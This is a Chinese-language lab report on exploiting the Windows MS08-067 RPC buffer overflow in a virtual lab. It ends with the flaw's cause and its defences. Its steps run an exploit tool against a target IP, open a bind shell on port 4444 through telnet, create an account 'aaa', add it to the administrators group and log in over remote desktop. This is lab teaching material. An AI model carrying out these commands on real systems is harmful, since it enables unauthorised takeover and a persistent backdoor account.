MS08067利用方法
一、实验目的及要求 1. 掌握利用MS08067远程溢出工具发送特殊构造的数据包,使目标主机产生溢出,然后执行shellcode代码,,打开目标主机端口,使用telnet连接目标端口,获得系统权限。 二、实验设备(环境)及要求 PC机, VC++等,虚拟云平台 三、实验内容与步骤 1.进入”c:\tools\MS08067利用方法”的目录
2.输入“MS08067.exe”,显示工具使用方法
3.输入“MS08067.exe 192.168.1.3”,向远程主机192.168.1.3发送一串特殊构造的数据包,使目标主机内存溢出,程序跳转到shellcode代码处执行,shellcode代码在目标主机上开启4444端口,等待连接。
4.输入命令“telnet 192.168.1.3 4444”,进行连接。
5.用ipconfig命令查看当前ip
6.输入“net user aaa 123456 /add”,新建用户aaa
7.输入命令“net localgroup administrators aaa /add”,将aaa添加到管理员组
8.输入命令“netstat -an”查看远程主机开放端口,发现3389已经打开。
9.使用aaa账户进行远程登陆 四、实验结果与数据处理 1.显示MS08067使用方法
2.使用工具进行内存溢出
3.telnet连接成功,查看目的ip
4.创建aaa用户并让其加入管理员组
5.查看3389端口开启情况 6.使用aaa远程登陆192.168.1.3
五、分析与讨论 通过这个实验,MS08067漏洞产生的原因:由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。 防护:打上补丁,将Computer Browser、Server、Workstation这三个系统服务关闭,毕竟这三个服务在大多数情况下是用不到的。同时,为了防止以后RPC又出现什么漏洞,最好是安装防火墙,关闭本机的445端口 |